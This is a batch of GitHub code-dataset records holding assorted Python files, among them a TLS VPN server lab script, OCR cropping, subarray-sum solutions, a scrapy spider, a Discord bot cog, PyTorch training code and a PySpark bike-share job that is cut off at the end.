ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)\ncontext.load_cert_chain(certfile=certFile, keyfile=keyFile)\n\n# Setup TCP socket\nsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntimeout = 2\nsocket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVTIMEO, timeout)\nsocket.bind((IP_A, PORT))\nsocket.listen(5)\n\n# We assume that sock and tun file descriptors have already been created.\nip, port = \"10.9.0.5\", 12345\n\n\ndef deal_with_client(secure_sock):\n\twhile True:\n\t\t# this will block until at least one interface is ready\n\t\tprint(\"waiting for ready\")\n\t\tready, _, _ = select.select([secure_sock, tun], [], [])\n\n\t\tfor fd in ready:\n\t\t\tprint(\"fd\", fd)\n\t\t\tif fd is secure_sock:\n\t\t\t\tprint(\"wait\")\n\t\t\t\t#data, (ip, port) = secure_sock.recv(2048)\n\t\t\t\tdata = secure_sock.recv(2048)\n\t\t\t\tprint(\"received:\", data)\n\t\t\t\tpkt = IP(data)\n\t\t\t\ttcp = TCP(sport=1234, dport=80, flags=\"S\", seq=1)\n\t\t\t\tpkt = pkt / tcp\n\t\t\t\tprint(\"packet:\", pkt)\n\t\t\t\tprint(\"From socket <==: {} --> {}\".format(pkt.src, pkt.dst))\n\t\t\t\tos.write(tun, bytes(pkt))\n\t\t\t\tprint(\"has written to tun\")\n\t\t\tif fd is tun:\n\t\t\t\tprint(\"waiting for tun\")\n\t\t\t\tpacket = os.read(tun, 2048)\n\t\t\t\tpkt = IP(packet)\n\t\t\t\tprint(\"From tun ==>: {} --> {}\".format(pkt.src, 
pkt.dst))\n\t\t\t\t#secure_sock.sendto(packet, (ip, port))\n\t\t\t\tsecure_sock.sendall(packet)\n\n\n\nwhile True:\n\tnewSocket, fromIP = socket.accept()\n\t# wrap the socket in a TLS/SSL layer\n\tsecure_sock = context.wrap_socket(newSocket, server_side=True)\n\ttry:\n\t\tdeal_with_client(secure_sock)\n\texcept Exception as e:\n\t\tprint(\"excetion:\", e)","repo_name":"nielsbjorn-da/SS2023","sub_path":"Assignment 2/TLS VPN/Labsetup/volumes/server_TCP_tun.py","file_name":"server_TCP_tun.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14523333428","text":"import os\nimport numpy as np\nimport cv2\nimport pandas as pd\n\nclass Cropper():\n def __init__(self, output_folder):\n self.output_folder = output_folder\n\n def crop_utils(self, pts):\n\n \"\"\"\n Takes inputs as 8 points\n and Returns cropped, masked image with a white background\n \"\"\"\n rect = cv2.boundingRect(pts)\n x,y,w,h = rect\n cropped = self.img.copy().crop((x,y,x+w,y+h))\n return cropped\n\n\n def crop(self, image, df):\n self.score_bbox = df['Scores']\n self.bbox_coords = df['BBox']\n self.img = image.copy()\n num_bboxes = len(self.score_bbox)\n for num in range(num_bboxes):\n bbox_coords = self.bbox_coords[num]\n if bbox_coords.size != 0:\n l_t = float(bbox_coords[0][0])\n t_l = float(bbox_coords[0][1])\n r_t = float(bbox_coords[1][0])\n t_r = float(bbox_coords[1][1])\n r_b = float(bbox_coords[2][0])\n b_r = float(bbox_coords[2][1])\n l_b = float(bbox_coords[3][0])\n b_l = float(bbox_coords[3][1])\n pts = np.array([[int(l_t), int(t_l)], [int(r_t) ,int(t_r)], [int(r_b) , int(b_r)], [int(l_b), int(b_l)]])\n \n if np.all(pts) > 0:\n \n box = self.crop_utils(pts)\n try:\n file_name = os.path.join(self.output_folder,f'{num}.jpg')\n print(os.getcwd())\n print(file_name)\n box.save(file_name)\n except:\n continue\n else:\n print('None')","repo_name":"nhamnx/receipt_ocr","sub_path":"modules/text_detection/crop.py","file_name":"crop.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"28412292916","text":"class Solution:\n \"\"\"\n @param: A: An integer array\n @return: A list of integers includes the index of the first number and the index of the last number\n \"\"\"\n def continuousSubarraySum(self, A):\n # O(n)\n # max_sum, compare with prefix_sum[i] - min(prefix_sum[:i])\n # prefix_sum[i] = sum(A[0] ... 
A[i-1])\n min_ind, max_sum = 0, - float('inf')\n prefix_sum = [0]\n result = [-1, -1]\n for i, num in enumerate(A):\n cur_sum = prefix_sum[i] + num\n prefix_sum.append(cur_sum)\n if max_sum < cur_sum - prefix_sum[min_ind]:\n max_sum = cur_sum - prefix_sum[min_ind]\n result = [min_ind, i]\n min_ind = i + 1 if cur_sum < prefix_sum[min_ind] else min_ind \n \n return result\n \n \n ######### enumeration ########\n# Simple enumeration: while enumerating, maintain the maximum sum ending at the current element.\n# On each iteration, add the current element to this sum; before adding, check:\n# if the sum is negative, abandon the previous elements, reset the sum, and set the left endpoint of the interval to the current element;\n# if it is positive, just keep accumulating.\nclass Solution:\n # @param {int[]} A an integer array\n # @return {int[]} A list of integers includes the index of the \n # first number and the index of the last number\n def continuousSubarraySum(self, A):\n ans = -0x7fffffff\n sum = 0\n start, end = 0, -1\n result = [-1, -1]\n for x in A:\n if sum < 0:\n sum = x\n start = end + 1\n end = start\n else:\n sum += x\n end += 1\n if sum > ans:\n ans = sum\n result = [start, end]\n\n return result\n","repo_name":"KunyiLiu/algorithm_problems","sub_path":"kunyi/data_structure/continuous-subarray-sum.py","file_name":"continuous-subarray-sum.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16900572600","text":"import scrapy\n\nfrom feeds.loaders import FeedEntryItemLoader\nfrom feeds.spiders import FeedsSpider\n\n\nclass AkCiandoComSpider(FeedsSpider):\n name = \"ak.ciando.com\"\n start_urls = [\n \"https://ak.ciando.com/shop/index.cfm?fuseaction=cat_overview&cat_ID=0\"\n \"&cat_nav=0&more_new=1&rows=100&intStartRow=1\"\n ]\n\n feed_title = \"AK Digitale Bibliothek\"\n feed_subtitle = \"Neue Titel in der digitalen AK Bibliothek\"\n feed_link = f\"https://{name}\"\n\n def parse(self, response):\n for link in response.xpath('//p[@class=\"p_blr_title\"]//a/@href').extract():\n yield scrapy.Request(response.urljoin(link), self.parse_item)\n\n def parse_item(self, response):\n il = FeedEntryItemLoader(\n selector=response.xpath('//div[@id=\"maincontentbook\"]'),\n base_url=self.feed_link,\n )\n il.add_xpath(\"title\", '//h1[@class=\"p_book_title\"]/text()')\n il.add_xpath(\"title\", '//h3[@class=\"p_book_title_ebook\"]/text()')\n il.add_value(\"link\", response.url)\n il.add_value(\"author_name\", self.feed_title)\n il.add_xpath(\"content_html\", '//h1[@class=\"p_book_title\"]/text()')\n il.add_xpath(\"content_html\", '//h2[@class=\"p_book_author\"]/text()')\n il.add_xpath(\"content_html\", '//p[@class=\"p_book_publisher\"]/text()')\n il.add_xpath(\"content_html\", '//p[@class=\"p_book_isbn\"]/text()')\n il.add_xpath(\"content_html\", '(//span[@class=\"txt10px\"])[1]/text()')\n il.add_xpath(\"content_html\", '(//span[@class=\"txt10px\"])[3]/text()')\n il.add_xpath(\"content_html\", '//div[@class=\"bookcontent\"]//text()')\n il.add_xpath(\"content_html\", '//div[@class=\"p_book_image\"]/img')\n il.add_xpath(\"content_html\", '//span[@style=\"color:red;\"]/b/text()')\n return il.load_item()\n","repo_name":"SolaraWW/PyFeeds","sub_path":"feeds/spiders/ak_ciando_com.py","file_name":"ak_ciando_com.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"7179961458","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\npyTOP.exceptions\n~~~~~~~~~~~~~~~~~~~\n\nThis module contains the set of pyTOP's exceptions.\n\n\"\"\"\n\nERROR_MESSAGES = {\n\n #系统级错误 (system-level errors)\n 3:u'图片上传失败',\n 4:u'用户调用次数超限',\n 5:u'会话调用次数超限',\n 6:u'合作伙伴调用次数超限',\n 7:u'应用调用次数超限',\n 
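Aside on the continuousSubarraySum record above: its comments state the prefix-sum invariant (best sum ending at i is prefix_sum[i+1] minus the minimum earlier prefix). A small worked trace of that idea on a concrete array, standalone and independent of the class above:

# Worked example on A = [-3, 1, 3, -3, 4]
A = [-3, 1, 3, -3, 4]
prefix = [0]
for num in A:
    prefix.append(prefix[-1] + num)
# prefix == [0, -3, -2, 1, -2, 2]

best = max((prefix[j] - min(prefix[:j]), j) for j in range(1, len(prefix)))
# best sum is prefix[5] - min(prefix[:5]) = 2 - (-3) = 5,
# i.e. the subarray A[1:5] == [1, 3, -3, 4]
assert best[0] == 5 == sum(A[1:5])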
8:u'应用调用频率超限',\n 9:u'HTTP方法被禁止(请用大写的POST或GET)',\n 10:u'服务不可用',\n 11:u'开发者权限不足',\n 12:u'用户权限不足',\n 13:u'合作伙伴权限不足',\n 15:u'远程服务出错',\n 21:u'缺少方法名参数',\n 22:u'不存在的方法名',\n 23:u'非法数据格式',\n 24:u'缺少签名参数',\n 25:u'非法签名',\n 26:u'缺少SessionKey参数',\n 27:u'无效的SessionKey参数',\n 28:u'缺少AppKey参数',\n 29:u'非法的AppKey参数',\n 30:u'缺少时间戳参数',\n 31:u'非法的时间戳参数',\n 32:u'缺少版本参数',\n 33:u'非法的版本参数',\n 34:u'不支持的版本号',\n 40:u'缺少必选参数',\n 41:u'非法的参数',\n 42:u'请求被禁止',\n 43:u'参数错误',\n\n #容器类错误 (container-level errors)\n 100:u'授权码已经过期',\n 101:u'授权码在缓存里不存在,一般是用同样的authcode两次获取sessionkey',\n 103:u'appkey或者tid(插件ID)参数必须至少传入一个',\n 104:u'appkey或者tid对应的插件不存在',\n 105:u'插件的状态不对,不是上线状态或者正式环境下测试状态',\n 106:u'没权限调用此app,由于插件不是所有用户都默认安装,所以需要用户和插件进行一个订购关系。',\n 108:u'由于app有绑定昵称,而登陆的昵称不是绑定昵称,所以没权限访问。',\n 109:u'服务端在生成参数的时候出了问题(一般是tair有问题)',\n 110:u'服务端在写出参数的时候出了问题',\n 111:u'服务端在生成参数的时候出了问题(一般是tair有问题)',\n\n #业务级错误 (business-level errors)\n 501:u'语句不可索引',\n 502:u'数据服务不可用',\n 503:u'无法解释TBQL语句',\n 504:u'需要绑定用户昵称',\n 505:u'缺少参数',\n 506:u'参数错误',\n 507:u'参数格式错误',\n 508:u'获取信息权限不足',\n 540:u'交易统计服务不可用',\n 541:u'类目统计服务不可用',\n 542:u'商品统计服务不可用',\n 550:u'用户服务不可用',\n 551:u'商品服务不可用',\n 552:u'商品图片服务不可用',\n 553:u'商品更新服务不可用',\n 554:u'商品删除失败',\n 555:u'用户没有订购图片服务',\n 556:u'图片URL错误',\n 557:u'商品视频服务不可用',\n 560:u'交易服务不可用',\n 561:u'交易服务不可用',\n 562:u'交易不存在',\n 563:u'非法交易',\n 564:u'没有权限添加或更新交易备注',\n 565:u'交易备注超出长度限制',\n 566:u'交易备注已经存在',\n 567:u'没有权限添加或更新交易信息',\n 568:u'交易没有子订单',\n 569:u'交易关闭错误',\n 570:u'物流服务不可用',\n 571:u'非法的邮费',\n 572:u'非法的物流公司编号',\n 580:u'评价服务不可用',\n 581:u'添加评价服务错误',\n 582:u'获取评价服务错误',\n 590:u'店铺服务不可用',\n 591:u'店铺剩余推荐数 服务不可用',\n 592:u'卖家自定义类目服务不可用',\n 594:u'卖家自定义类目添加错误',\n 595:u'卖家自定义类目更新错误',\n 596:u'用户没有店铺',\n 597:u'卖家自定义父类目错误',\n 601:u'用户不存在',\n 611:u'产品数据格式错误',\n 612:u'产品ID错误',\n 613:u'删除产品图片错误',\n 614:u'没有权限添加产品',\n 615:u'收货地址服务不可用',\n 620:u'邮费服务不可用',\n 621:u'邮费模板类型错误',\n 622:u'缺少参数:post, express或ems',\n 623:u'邮费模板参数错误',\n 630:u'收费服务不可用',\n 650:u'退款服务不可用',\n 651:u'非法的退款编号',\n 670:u'佣金服务不可用',\n 671:u'佣金交易不存在',\n 672:u'淘宝客报表服务不可用',\n 673:u'备案服务不可用',\n 674:u'应用服务不可用',\n 710:u'淘宝客服务不可用',\n 900:u'远程连接错误',\n 901:u'远程服务超时',\n 902:u'远程服务错误',\n \n #CUSTOM ERRORS\n 1000:u'Bad Environment',\n}\n\nclass TOPException(Exception):\n \"\"\"There was an ambiguous exception that occurred while handling your\n TOP request.\"\"\"\n def __init__(self, code, msg=None):\n if not msg:\n msg = ERROR_MESSAGES.get(code,u'未知错误(%d)'%code)\n if type(msg) == unicode:\n msg = msg.encode('utf-8')\n super(TOPException, self).__init__(msg)\n self.code = code\n \n def __str__(self):\n return \"%s (code=%d)\" % (super(TOPException, self).__str__(), self.code)\n \n __repr__ = __str__\n","repo_name":"bububa/pyTOP","sub_path":"pyTOP/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":4929,"program_lang":"python","lang":"zh","doc_type":"code","stars":44,"dataset":"github-code","pt":"67"} +{"seq_id":"11463589947","text":"import discord, os\r\nfrom discord.ext import commands\r\nfrom libraries.enemy_handling import Enemy\r\nfrom libraries.fight_handling import Fight\r\nfrom libraries.player_handling import Player\r\n\r\ndefault_fight_directory = 'data/enemies/'\r\nSPECIAL = [(0,0),(0,6),(6,6)]\r\n\r\n#used to check if the command is executed in the channel #bot-commands or direct messages\r\nasync def in_bot_commands_or_dm(ctx):\r\n return ctx.channel.id == 519104699211972640 or isinstance(ctx.channel, discord.DMChannel)\r\n\r\nclass fight_system:\r\n '''Commands for fights'''\r\n def __init__(self, bot):\r\n self.bot = bot\r\n print('Fight System Loaded!')\r\n\r\n @commands.command()\r\n 
@commands.check(in_bot_commands_or_dm)\r\n @commands.is_owner()\r\n async def startfight(self, ctx):\r\n '''Used to start a fight with a random enemy. TESTING & OWNER ONLY.'''\r\n self.fight = Fight(ctx.author.id)\r\n await ctx.author.send(self.fight.initiate_fight()) #Using this we call the initiate_fight function and whatever is returned we send to the user\r\n del self.fight\r\n\r\n @commands.command()\r\n @commands.check(in_bot_commands_or_dm)\r\n async def attack(self, ctx):\r\n '''Used to choose an option in a fight.'''\r\n self.fight = Fight(ctx.author.id)\r\n self.message = self.fight.attack()\r\n await ctx.author.send(self.message) #Using this we call the attack function and whatever is returned we send to the user\r\n del self.fight\r\n if 'Successfully moved!' in self.message: #if the string is in the message means the player was moving before so we send their new location\r\n self.player = Player(ctx.author.id)\r\n self.player.save_map()\r\n file = discord.File('data/players/maps/' + str(ctx.author.id) + '.png')\r\n await ctx.author.send(file=file)\r\n await self.update_ranks(ctx, self.player.get_coords())\r\n del self.player\r\n\r\n @commands.command()\r\n @commands.check(in_bot_commands_or_dm)\r\n async def run(self, ctx):\r\n '''Used to choose an option in a fight.'''\r\n self.fight = Fight(ctx.author.id)\r\n await ctx.author.send(self.fight.run()) #Using this we call the run function and whatever is returned we send to the user\r\n del self.fight\r\n\r\n @commands.command()\r\n @commands.check(in_bot_commands_or_dm)\r\n async def item(self, ctx, *item_name):\r\n '''Used to use an item during a fight.'''\r\n self.fight = Fight(ctx.author.id)\r\n self.item_name = ' '.join(item_name)\r\n self.message = self.fight.use_item(self.item_name)\r\n await ctx.author.send(self.message) #Using this we call the use_item function and whatever is returned we send to the user\r\n del self.fight\r\n if 'Successfully moved!' 
in self.message: #if the string is in the message means the player was moving before so we send their new location\r\n self.player = Player(ctx.author.id)\r\n self.player.save_map()\r\n file = discord.File('data/players/maps/' + str(ctx.author.id) + '.png')\r\n await ctx.author.send(file=file)\r\n await self.update_ranks(ctx, self.player.get_coords())\r\n del self.player\r\n\r\n async def update_ranks(self, ctx, coords):\r\n '''Used to update the ranks in the server according to the users position'''\r\n #We get the roles from the server\r\n self.city_one = discord.utils.get(self.bot.guilds[0].roles, name='City One')\r\n self.city_two = discord.utils.get(self.bot.guilds[0].roles, name='City Two')\r\n self.city_three = discord.utils.get(self.bot.guilds[0].roles, name='City Three')\r\n self.wilderness = discord.utils.get(self.bot.guilds[0].roles, name='Wilderness')\r\n if coords in SPECIAL: #If user went to a city we remove the wilderness role and give them a city role\r\n for user in self.bot.guilds[0].members:\r\n if ctx.author == user:\r\n await user.remove_roles(self.wilderness)\r\n if coords == (0, 0):\r\n await user.add_roles(self.city_one)\r\n elif coords == (0, 6):\r\n await user.add_roles(self.city_two)\r\n elif coords == (6, 6):\r\n await user.add_roles(self.city_three)\r\n else: #If user went to wilderness we remove all city roles and give wilderness role\r\n for user in self.bot.guilds[0].members:\r\n if ctx.author == user:\r\n await user.remove_roles(self.city_one, self.city_two, self.city_three)\r\n await user.add_roles(self.wilderness)\r\n\r\ndef setup(bot):\r\n bot.add_cog(fight_system(bot))","repo_name":"emiipo/discord-and-dragons","sub_path":"cogs/fight_system.py","file_name":"fight_system.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21849467583","text":"class NumError(Exception):\n def __init__(self, exp, mes):\n self.exp = exp\n self.mes = mes\n\n\nclass Dr:\n def __init__(self, top, bottom):\n if top > bottom:\n raise NumError(top, 'Should')\n self.top = top\n self.bottom = bottom\n\n def __add__(self, other):\n new_top = self.top * other.bottom + other.top * self.bottom\n new_bot = self.bottom * other.bottom\n return Dr(new_top, new_bot)\n\n def __sub__(self, other):\n new_top = self.top * other.bottom - other.top * self.bottom\n new_bot = self.bottom * other.bottom\n return Dr(new_top, new_bot)\n\n def __mul__(self, other):\n if isinstance(other, int):\n new_top = self.top * other\n return Dr(new_top, self.bottom)\n else:\n new_top = self.top * other.top\n new_bot = self.bottom * other.bottom\n return Dr(new_top, new_bot)\n\n def __eq__(self, other):\n new_num = self.top / self.bottom\n new_num2 = other.top / other.bottom\n return new_num == new_num2\n\n def __str__(self):\n return f'{self.top} / {self.bottom}'\n\n\ndr1 = Dr(1, 4)\ndr2 = Dr(5, 6)\n\nprint(Dr.__add__(dr1, dr2))\nprint(Dr.__sub__(dr1, dr2))\nprint(Dr.__mul__(dr1, dr2))\nprint(Dr.__eq__(dr1, dr2))\n","repo_name":"komararyna/HomeworkPro5","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36334108831","text":"import torch\nfrom torch import nn\n\n\ndef stochastic_gradient_descent(parameters, f_learn_rate, f_batch_size):\n \"\"\"小批量随机梯度下降\"\"\"\n with torch.no_grad():\n # 更新的时候不需要梯度参与运算\n for parameter in parameters:\n # print('parameter = ', parameter)\n 
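            # the update below is the plain minibatch SGD rule: each parameter steps
            # against its gradient; the upstream loss is summed over the batch, so
            # dividing by f_batch_size applies the mean gradient, and grad.zero_()
            # clears the buffer so gradients do not accumulate across iterations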
# print('parameter.grad = ', parameter.grad)\n parameter -= f_learn_rate * parameter.grad /f_batch_size\n parameter.grad.zero_()\n\n\nx = torch.tensor([[0.0, 1], [2, 3]])\nw1 = torch.tensor([[0.4], [0.5]])\nw1.requires_grad_(True)\nw2 = torch.tensor([[0.4], [0.5]])\nw2.requires_grad_(True)\nw3 = torch.tensor([[0.4], [0.5]])\nw3.requires_grad_(True)\nw4 = torch.tensor([[0.4], [0.5]])\nw4.requires_grad_(True)\n\ny_hat1 = torch.matmul(x, w1)\ny_hat2 = torch.matmul(x, w2)\ny_hat3 = torch.matmul(x, w3)\ny_hat4 = torch.matmul(x, w4)\ny = torch.tensor([[1.0], [1]])\nprint(\"y = \", y)\nprint(\"y_hat = \", y_hat1)\n\nl1 = nn.MSELoss(reduction='none')(y_hat1, y)\nprint(\"l1 = \", l1)\nl1.sum().backward()\nprint(\"w1.grad = \", w1.grad)\ntorch.optim.SGD([w1], 0.1).step()\nprint(\"w1 = \", w1)\n\nl2 = nn.MSELoss(reduction='sum')(y_hat2, y)\nprint(\"l2 = \", l2)\nl2.backward()\nprint(\"w2.grad = \", w2.grad)\ntorch.optim.SGD([w2], 0.1).step()\nprint(\"w2 = \", w2)\n\nl3 = nn.MSELoss(reduction='none')(y_hat3, y)\nprint(\"l3 = \", l3)\nl3.sum().backward()\nprint(\"w3.grad = \", w3.grad)\nstochastic_gradient_descent([w3], 0.1, 2)\nprint(\"w3 = \", w3)\n\nl4 = nn.MSELoss(reduction='sum')(y_hat4, y)\nprint(\"l4 = \", l4)\nl4.backward()\nprint(\"w4.grad = \", w4.grad)\nstochastic_gradient_descent([w4], 0.1, 2)\nprint(\"w4 = \", w4)\n\n# y = tensor([[1.],\n# [1.]])\n# y_hat = tensor([[0.5000],\n# [2.3000]], grad_fn=)\n# l1 = tensor([[0.2500],\n# [1.6900]], grad_fn=)\n# w1.grad = tensor([[5.2000],\n# [6.8000]])\n# w1 = tensor([[-0.1200],\n# [-0.1800]], requires_grad=True)\n# l2 = tensor(1.9400, grad_fn=)\n# w2.grad = tensor([[5.2000],\n# [6.8000]])\n# w2 = tensor([[-0.1200],\n# [-0.1800]], requires_grad=True)\n# l3 = tensor([[0.2500],\n# [1.6900]], grad_fn=)\n# w3.grad = tensor([[5.2000],\n# [6.8000]])\n# w3 = tensor([[0.1400],\n# [0.1600]], requires_grad=True)\n# l4 = tensor(1.9400, grad_fn=)\n# w4.grad = tensor([[5.2000],\n# [6.8000]])\n# w4 = tensor([[0.1400],\n# [0.1600]], requires_grad=True)\n","repo_name":"MildCloud/LearningDeepLearningByHand","sub_path":"MarkovModel/grad_fn.py","file_name":"grad_fn.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8754361902","text":"from src.utils.to_string import to_string\nfrom src.datasets import EmbeddingsTrackLevel\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torch.nn.utils.rnn import pad_sequence, pack_padded_sequence\nfrom torch import nn\nfrom src.models.commons import SequenceCategoricalClassification\nfrom src.early_stopping import EarlyStopping\nfrom src.metrics import compute_metrics\nfrom tqdm import tqdm\n\n\ndef test_loop(dataloader, model, loss_fn):\n test_loss = 0\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n predictions = []\n ys = []\n\n with torch.no_grad():\n for batch in dataloader:\n\n X = [sample[0].to(device) for sample in batch]\n Y = [sample[1].to(device) for sample in batch]\n\n lengths = [len(x) for x in X]\n X = pad_sequence(X)\n X = pack_padded_sequence(\n X, lengths, batch_first=False, enforce_sorted=False\n )\n\n Y = torch.stack(Y)\n pred = model(X)\n\n predictions.append(pred)\n ys.append(Y)\n\n test_loss += loss_fn(pred, Y).item()\n\n predictions, ys = torch.cat(predictions), torch.cat(ys)\n\n test_loss /= len(dataloader.dataset)\n\n return predictions, ys\n\n\ndef train_loop(dataloader, model, loss_fn, optimizer):\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n for n_batch, 
batch in enumerate(tqdm(dataloader)):\n\n X = [sample[0].to(device) for sample in batch]\n Y = [sample[1].to(device) for sample in batch]\n\n lengths = [len(x) for x in X]\n X = pad_sequence(X)\n X = pack_padded_sequence(X, lengths, batch_first=False, enforce_sorted=False)\n\n Y = torch.stack(Y)\n\n pred = model(X)\n loss = loss_fn(pred, Y)\n\n # Backpropagation\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if n_batch % 100 == 0:\n loss, _ = loss.item(), n_batch * len(X)\n\n\ndef run(params, training_data, test_data, return_metrics=True):\n assert set(list(params.keys())) == set(\n [\"batch_size\", \"learning_rate\", \"weight_decay\", \"num_workers\"]\n )\n\n train_dataloader = DataLoader(\n training_data,\n batch_size=params[\"batch_size\"],\n num_workers=params[\"num_workers\"],\n collate_fn=lambda x: x,\n pin_memory=True,\n )\n test_dataloader = DataLoader(\n test_data,\n batch_size=params[\"batch_size\"],\n num_workers=params[\"num_workers\"],\n collate_fn=lambda x: x,\n pin_memory=True,\n )\n\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n print(f\"Using device: {device}\")\n model = SequenceCategoricalClassification().to(device)\n loss_fn = nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(\n model.parameters(),\n lr=params[\"learning_rate\"],\n weight_decay=params[\"weight_decay\"],\n )\n early_stopping = EarlyStopping(patience=10)\n\n array = [None]\n while True:\n train_loop(train_dataloader, model, loss_fn, optimizer)\n predictions, ys = test_loop(test_dataloader, model, loss_fn)\n metrics = compute_metrics(predictions, ys)\n array.append((predictions, ys))\n\n print(to_string(metrics))\n if early_stopping.stop(metrics):\n break\n\n best_epoch, metrics = early_stopping.best()\n if return_metrics:\n return metrics\n else:\n return array[best_epoch]\n\n\nif __name__ == \"__main__\":\n params = {\n \"learning_rate\": 0.37,\n \"weight_decay\": 10 ** -6,\n \"batch_size\": 32,\n \"num_workers\": 0,\n }\n training_data = EmbeddingsTrackLevel(split=\"train\", method=\"matrix_factorization\")\n\n validation_data = EmbeddingsTrackLevel(\n split=\"validation\", method=\"matrix_factorization\"\n )\n run(params, training_data, validation_data)\n","repo_name":"GiovanniGabbolini/playlist-context-prediction","sub_path":"src/models/sequence_two_steps.py","file_name":"sequence_two_steps.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"5794735134","text":"from openpyxl import Workbook,load_workbook\n\n\n#写入\nexcel_adress = r\"F:\\Python操作Excel测试.xlsx\"\n\nwb = load_workbook(excel_adress)\nsht = wb[wb.sheetnames[0]]\n\n\nprint() ##sheetnames是获取工作表中的所有表的表名,即可查看该xlsx文件里面所有表\n\nprint(sht)\n\n\n# 没有定位直接写入\nlist_1 = [5, 6, 7, 8]\nsht.append(list_1)\n\n# 增加一个定位\nsht[\"A3\"] = \"开始\"\nlist_2 = [1, 2, 3, 4]\nsht.append(list_2)\n\n# 增加一个定位\nsht[\"D5\"] = \"新开始\"\nlist_3 = [11, 12, 13, 14]\nsht.append(list_3)\n\n# 增加一个定位\nsht[\"L15\"] = \"新开始2\"\nlist_4 = [21, 22, 23, 24]\nlist_5 = [21, \"赌气回答我的\", 23, 24]\nsht.append(list_4)\nsht.append(list_5)\n\nwb.save(excel_adress)\n\n\n\n\n\n\n","repo_name":"zhcWindCloud/Python_Tests","sub_path":"Python_Operations/python之操作Excel.py","file_name":"python之操作Excel.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12112407327","text":"import pytest\n\nfrom src.repository import memrepo\nfrom src.shared.domain_model_abc import 
DomainModel\n\n\n@pytest.fixture\ndef user_dicts():\n return [\n {\n \"user_id\": \"305a6c67-8bea-4994-81ed-b6511c4b181f\",\n \"login\": \"user1\",\n },\n {\n \"user_id\": \"f30dcc11-6f48-4bfb-a17e-f90b9d566c03\",\n \"login\": \"user2\",\n },\n {\n \"user_id\": \"de9538b3-98f7-4469-b111-2ac64170c84f\",\n \"login\": \"user3\",\n },\n ]\n\n\ndef _check_results(domain_models_list, data_list):\n assert len(domain_models_list) == len(data_list)\n assert all([isinstance(dm, DomainModel) for dm in domain_models_list])\n assert set([dm.login for dm in domain_models_list]) == set(\n [d[\"login\"] for d in data_list]\n )\n\n\nclass TestMemrepoList:\n def test_without_parameters(self, user_dicts):\n repo = memrepo.MemRepo(user_dicts)\n _check_results(repo.list(), user_dicts)\n\n def test_with_filters_unknown_key(self, user_dicts):\n repo = memrepo.MemRepo(user_dicts)\n\n with pytest.raises(KeyError):\n repo.list(filters={\"/\": \"unexpected param\"})\n\n def test_with_filters_unknown_operator(self, user_dicts):\n repo = memrepo.MemRepo(user_dicts)\n\n with pytest.raises(ValueError):\n repo.list(filters={\"login__in\": [20, 30]})\n\n def test_with_filters_login(self, user_dicts):\n repo = memrepo.MemRepo(user_dicts)\n\n _check_results(repo.list(filters={\"login\": \"user3\"}), [user_dicts[2]])\n\n def test_with_filters_login_eq(self, user_dicts):\n repo = memrepo.MemRepo(user_dicts)\n\n _check_results(repo.list(filters={\"login\": \"user3\"}), [user_dicts[2]])\n\n def test_with_filters_user_id(self, user_dicts):\n repo = memrepo.MemRepo(user_dicts)\n\n _check_results(\n repo.list(filters={\"user_id\": \"de9538b3-98f7-4469-b111-2ac64170c84f\"}),\n [user_dicts[2]],\n )\n","repo_name":"tuod/bikerides","sub_path":"backend/tests/repository/test_memrepo.py","file_name":"test_memrepo.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33703135354","text":"from datetime import datetime\nfrom pyspark.sql.functions import col, udf\nfrom pyspark.sql.types import DateType\n\ndef getZip(st):\n\tif st == 'Mountain View':\n\t\treturn 94041\n\telif st == 'Palo Alto':\n\t\treturn 94301\n\telif st == 'Redwood City':\n\t\treturn 94063\n\telif st == 'San Jose':\n\t\treturn 95113\n\telif st == 'San Francisco':\n\t\treturn 94107\n\n\nStationData = sc.textFile('/Users/charuarora/Downloads/babs_open_data_year_1/201402_babs_open_data/201402_station_data.csv').map(lambda x: x.split(','))\n\nS_Header = StationData.first()\n\ns_data = StationData.filter(lambda row: row !=S_Header).map(lambda x: (x[0], getZip(x[5])))\n\n\nStatusData = sc.textFile('/Users/charuarora/Downloads/babs_open_data_year_1/201402_babs_open_data/201402_status_data.csv').map(lambda x: x.split(','))\n\nSt_Header = StatusData.first()\n\nst_data = StatusData.filter(lambda row: row !=St_Header).map(lambda x: ((x[0][1:-1],x[3][1:-1].split(' ')[0]), int(x[2][1:-1])))\n\n\nAveragedStatusData = st_data.groupByKey().mapValues(lambda x: sum(x)/len(x));\n\nCombinedData = AveragedStatusData.map(lambda x:(x[0][0],(x[0][1],x[1]))).join(s_data)\n\nResult = CombinedData.map(lambda x: ( 